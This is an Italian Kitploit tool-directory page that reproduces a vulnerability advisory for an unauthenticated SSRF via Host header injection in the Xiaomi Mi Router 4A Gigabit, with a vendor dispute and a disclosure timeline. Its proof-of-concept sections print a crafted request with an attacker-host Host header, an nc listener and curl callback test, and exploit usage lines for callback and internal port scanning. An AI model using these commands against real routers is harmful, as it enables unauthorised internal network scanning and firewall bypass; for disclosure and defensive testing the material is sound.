Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-26898-Xiaomi-SSRF-HostHeaderInjection — SSRF non autenticato in Xiaomi Mi Router 4A Gigabit Edition (firmware 3.0.24) tramite Host Header Injection — CVE-2026-26898 | Kitploit
Strumenti/GitHubGitHub/iwallplace/cve-2026-26898-xiaomi-ssrf-hostheaderinjection
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza di RetePenetration TestingRed Teaming
GitHubiwallplace/cve-2026-26898-xiaomi-ssrf-hostheaderinjection

CVE-2026-26898-Xiaomi-SSRF-HostHeaderInjection

SSRF non autenticato in Xiaomi Mi Router 4A Gigabit Edition (firmware 3.0.24) tramite Host Header Injection — CVE-2026-26898

Vedi Repository
1113 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-26898: Xiaomi Mi Router 4A Gigabit - SSRF tramite Host Header Injection

Vulnerability CVSS Status Vendor

Riepilogo

Una vulnerabilità di Server-Side Request Forgery (SSRF) esiste nello Xiaomi Mi Router 4A Gigabit Edition. L'interfaccia web del router non convalida l'header HTTP Host, consentendo a un attaccante non autenticato di forzare il router a effettuare connessioni TCP arbitrarie in uscita.

CampoValore
DispositivoXiaomi Mi Router 4A Gigabit Edition
Firmware3.0.24 (International)
CVECVE-2026-26898 (contestato — vedi Stato della Divulgazione sotto)
CWECWE-918 (Server-Side Request Forgery)
CVSS 3.18.6 (High) — valutazione del ricercatore; il fornitore contesta la gravità

Risposta del Fornitore e Stato della Divulgazione

Stato: Contestato dal fornitore — questo report non è stato accettato da Xiaomi.

  • Reportato a Xiaomi tramite HackerOne (report #3513458) il 2026-01-16.
  • Il 2026-01-23, Xiaomi ha chiuso il report come Informativo, affermando che è un problema noto in precedenza, che il router "si affida ancora alla funzione proxy", e che lo classificano come a basso rischio e non lo risolveranno.
  • Posizione del ricercatore: la valutazione della gravità è contestata. Il dispositivo è ancora attivamente venduto sui canali ufficiali Xiaomi (mi.com/tr) a partire da gennaio 2026, l'endpoint è raggiungibile senza autenticazione, e la SSRF consente scansioni della rete interna e accesso a servizi che fidano delle connessioni locali. Il comportamento rimane senza patch.

CVE-2026-26898 è usato qui solo per tracciamento; data la controversia con il fornitore, va trattato come contestato / non confermato, non confermato dal fornitore.

Endpoint Affetto

root@kitploit:~
GET /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: <ATTACKER_IP>:<PORT>

Prova di Concetto

Screenshot

Exploit Demo

Test Rapido

root@kitploit:~
python3 xiaomi_ssrf_exploit.py --target 192.168.31.1 --check

Output

root@kitploit:~
[*] Checking vulnerability on 192.168.31.1...
[*] Local IP: 192.168.31.235
[*] Test Port: 44444
[+] VULNERABLE! Router connected back to 192.168.31.235:44444

Test Manuale

root@kitploit:~
# Terminale 1: Avvia listener
nc -l 4444

# Terminale 2: Invia richiesta malevola
curl -H "Host: YOUR_IP:4444" "http://192.168.31.1/cgi-bin/luci/api/xqsystem/login"

Impatto

  • Scansione Rete Interna: Usare il router come proxy per scansionare reti interne
  • Bypass del Firewall: Accedere a servizi limitati all'IP del router
  • Catena di Attacco: Può essere combinato con altre vulnerabilità per RCE

File

FileDescrizione
xiaomi_ssrf_exploit.pyExploit completo con più modalità

Utilizzo dell'Exploit

root@kitploit:~
# Controlla se vulnerabile
python3 xiaomi_ssrf_exploit.py --target IP_ROUTER --check

# Modalità callback
python3 xiaomi_ssrf_exploit.py --target IP_ROUTER --callback TUO_IP --port 4444

# Scanner di porte
python3 xiaomi_ssrf_exploit.py --target IP_ROUTER --scan IP_TARGET --ports 22,23,80,443

Cronologia

DataEvento
2026-01-15Vulnerabilità scoperta; PoC sviluppato
2026-01-16Reportato a Xiaomi tramite HackerOne (#3513458)
2026-01-23Xiaomi ha chiuso il report come Informativo (basso rischio, non verrà risolto)
2026-06-03Advisory pubblico pubblicato (questo repository) — contestato dal fornitore, senza patch

Riferimenti

  • Report HackerOne #3513458 (inviato a Xiaomi; chiuso come Informativo)
  • CWE-918: Server-Side Request Forgery (SSRF)

Dichiarazione di Esclusione di Responsabilità

Questo exploit è fornito solo per scopi educativi e di test di sicurezza autorizzati. L'accesso non autorizzato a sistemi informatici è illegale.

Autore

Ahmet Mersin
🌐 ahmetmersin.com
🐙 @iwallplace

Scarica lo strumento